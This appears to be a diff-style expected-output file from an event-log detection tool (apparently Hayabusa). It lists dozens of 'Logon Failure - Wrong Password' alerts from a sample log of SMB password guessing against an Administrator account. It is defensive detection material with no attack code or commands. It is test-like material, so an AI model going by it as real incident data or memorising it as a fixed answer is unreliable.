+2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Edv4GwGfL156V1xe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Irvneva9RFn44iII  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dHtJFI8OL9kJylL5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F5Q4h62T77hGjhKe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DdSALwo9td9xUeBq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1kYfoqz1r1NuEn04  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7X400gufqdunUa8j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lLR8z7g0GY8r7a1r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QHMztrxiKBGtNqkp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7eBQevVhmZs5gHFD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lyQCs0PG6fGzpidu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XnsPjnCieyoFIbJZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ku6mjVaG1lCJrAo1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VwiyVIWHOGuHzhdO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 92v1rXcj5c0Lt3OF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yO2JYd6FfM2Y7px9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ltr5g8ZWUAdrPKxg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fjiPMy5uOTbbmaQ5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HDRVOzxca9wDJziV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DV28RjUK26Je2Dr9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: seoetT43w0S3FEss  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IdIU9Q9Ig4Bd3Aps  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jGzuHSHT59Qnp5jI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wPA1J7aQrZ064WSf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HhLFXDMUKGfdoc4S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: apVAhc6o3dhLmUll  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FYMdQeB4ZpFm8xDh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QewW1ISqRdXwtSXA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SFhBcgZfc9VZ5S8S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a4ZSRW7F65yDNbJd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HrbzGNYIbjErVtDR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eFcGaL3asLVIF08d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dhJvIM5PzA9U6GTD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KYrfD15TPp8OuST4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8d4CbZSTHhl7fRfa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IItrtl1h3PsKviaQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WVeoptuwLNKlm0V2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Rf6Ri9Lm81mScRt4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NPVkTRUILL5czcbF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QZJq3kjykwzh0hVh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lHL4KuirjQ96Dgfw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DSPjDklMHdW6LqK5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EL0oMweyFgI0MEdM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NJS2dZhWmCGF1Qos  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bNR5dXXnx0LeyNmW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ApUMxqDiqDNo6hrF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o3d1caGukhhBHp6s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oxDVCaWpkSECRoml  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: coqijUGaaVJXY4GV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7ATPa6qMbfQ9QDrW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mnQEE00r01jhCNzr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ir9sY7kG6vbOad4z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: REuk1RZ5eRs3pSbT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 91gfIcAUvKrSAENh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MtrVV1ux0v5w5XWZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rFpyAqPQP77Ls6ir  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nvwp4DimL7SgBmb0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u1lnJZDjghQNQxfG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pBN1g8NBIj6WMrhz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cJMUobtFTwOQTgqd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QGZeGqe9rC172BVa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zNP99dMvvDQl8WVw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qcwp0odjR0LfM11y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6VjaFCzZr8iUUovn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C3YniJHC0Cswfti0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 63lZpExTzSzNR96C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fKI61MTXJ5x9WF56  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NhWYNEPWgh03cQSJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pvZg2LTYtsUhvBhr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BENGUFtNxdPjaS03  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fY1s0OG9JR38H6rm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LblLG1Il6ngkuAOo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
